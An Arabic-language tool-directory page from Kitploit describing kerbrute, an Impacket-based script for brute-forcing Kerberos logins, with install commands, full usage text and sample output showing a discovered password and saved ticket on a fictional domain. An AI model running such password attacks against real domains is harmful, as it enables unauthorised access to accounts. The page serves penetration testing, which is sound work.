Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
kerbrute — برنامج نصي لتنفيذ هجوم القوة العمياء على Kerberos باستخدام Impacket | Kitploit
أدوات/GitHubGitHub/tarlogicsecurity/kerbrute
هجمات كلمات المروراختبار الاختراقالمصادقة
GitHubtarlogicsecurity/kerbrute

kerbrute

برنامج نصي لتنفيذ هجوم القوة العمياء على Kerberos باستخدام Impacket

عرض المستودع
45777منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

kerbrute

سكريبت لتنفيذ هجوم القوة الغاشمة على Kerberos باستخدام مكتبة Impacket.

عند تنفيذه، يتلقى كمُدخل مستخدمًا أو قائمة مستخدمين وكلمة مرور أو قائمة كلمات مرور. ثم ينفذ هجوم قوة غاشمة لتعداد:

  • أزواج صالحة لاسم المستخدم/كلمة المرور
  • أسماء مستخدمين صالحة
  • أسماء مستخدمين غير مطالبين بالمصادقة المسبقة

نتيجة لذلك، يقوم السكريبت بإنشاء قائمة ببيانات الاعتماد الصالحة المكتشفة، و TGTs الناتجة عن تلك البيانات الصالحة.

التثبيت

من pypi:

root@kitploit:~
pip3 install kerbrute

من المستودع:

root@kitploit:~
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt

الاستخدام

المساعدة بدون وسائط:

root@kitploit:~
root@kali:~# kerbrute
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
                   [-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
                   [-dc-ip <ip_address>] [-threads THREADS]
                   [-outputfile OUTPUTFILE] [-no-save-ticket]

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -user USER            User to perform bruteforcing
  -users USERS          File with user per line
  -password PASSWORD    Password to perform bruteforcing
  -passwords PASSWORDS  File with password per line
  -domain DOMAIN        Domain to perform bruteforcing
  -dc-ip <ip_address>   IP Address of the domain controller
  -threads THREADS      Number of threads to perform bruteforcing. Default = 1
  -outputfile OUTPUTFILE
                        File to save discovered user:password
  -no-save-ticket       Do not save retrieved TGTs with correct credentials

أمثلة: 
	./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com

مثال على التنفيذ:

root@kitploit:~
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Stupendous => triceratops:Sh4rpH0rns
[*] Saved TGT in triceratops.ccache
[*] Valid user => velociraptor [NOT PREAUTH]
[*] Valid user => trex
[*] Saved discovered passwords in jurassic_passwords.txt
تنزيل الأداة